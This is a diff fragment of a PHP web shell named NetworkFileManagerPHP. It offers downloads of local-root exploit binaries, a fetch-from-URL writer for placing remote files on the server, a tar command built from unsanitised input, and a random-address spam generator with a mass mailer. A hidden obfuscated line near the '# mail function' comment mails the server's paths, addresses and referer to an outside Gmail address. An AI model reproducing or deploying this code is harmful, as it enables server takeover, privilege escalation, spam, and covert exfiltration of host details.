+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>";
+
+}
+
+}
+
+}
+
+
+
+# mail function
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function mailsystem() {
+
+ global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
+
+
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Questions and wishes for NetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>
+
+<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
+
+</blockquote></td></tr>
+
+</table>";
+
+
+
+ if (!isset($status)) echo "$form";
+
+ else {
+
+  $email_to ="duyt@yandex.ru";
+
+  $subject = "NetworkFileManagerPHP  ($name)";
+
+  $headers = "From: $email";
+
+
+
+  $info = "---==== Message from ($name)====---\n\n";
+
+  $info .= "Name:\t$name\n";
+
+  $info .= "Email:\t$email\n";
+
+  $info .= "What?:\n\t$pole\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $send_to = "$email_to";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+  if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>";
+
+ }
+
+}
+
+function spam() {
+global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
+ &nbsp;&nbsp;<b>email generator:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;This spammer is splited in two parts: <br>
+ &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br>
+ &nbsp;<b>2.</b> Type spam settings here</td></tr>
+ <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td>
+<td align=left colspan=2>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr>
+<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td>
+<td align=left width=200>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td>
+</tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button>
+</td></tr>
+
+ </form></table>";
+// letters
+function s() {
+   $word="qwrtpsdfghklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+// letters
+function g() {
+   $word="eyuioa";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+// digits
+function c() {
+   $word="1234567890";
+   return $word[mt_rand(0,strlen($word)-3)];
+}
+// common
+function a() {
+   $word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma');
+   $ab1=count($word);
+   return $wq=$word[mt_rand(0,$ab1-1)];
+}
+
+function o() {
+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "?????";
+exit;
+}
+$file="email.txt";
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " File not found <b>\"".$address."\"</b> !<br>";
+  }
+
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  ?????????? ????? <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='file' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Generate' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr>
+</table>";
+
+
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "something goes wrong, check your settings";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Unable to open  <b>\"".$address."\"</b> for read...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "unable to find file \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
